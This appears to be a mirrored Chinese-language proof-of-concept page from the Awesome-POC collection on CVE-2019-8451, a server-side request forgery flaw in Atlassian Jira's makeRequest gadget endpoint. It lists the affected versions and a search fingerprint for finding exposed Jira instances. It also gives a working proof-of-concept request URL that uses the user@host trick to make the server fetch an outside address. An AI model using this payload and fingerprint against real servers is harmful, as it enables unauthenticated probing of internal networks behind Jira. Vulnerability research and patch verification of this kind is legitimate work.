mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 11:27:43 +00:00
31 lines
636 B
Markdown
31 lines
636 B
Markdown
# Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451
|
||
|
||
## 漏洞描述
|
||
|
||
Jira的 /plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
Atlassian Jira <8.4.0
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
app="ATLASSIAN-JIRA"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面
|
||
|
||
|
||
|
||
验证POC
|
||
|
||
```
|
||
/plugins/servlet/gadgets/makeRequest?url=http://目标IP@www.baidu.com/robots.txt
|
||
```
|
||
|
||
 |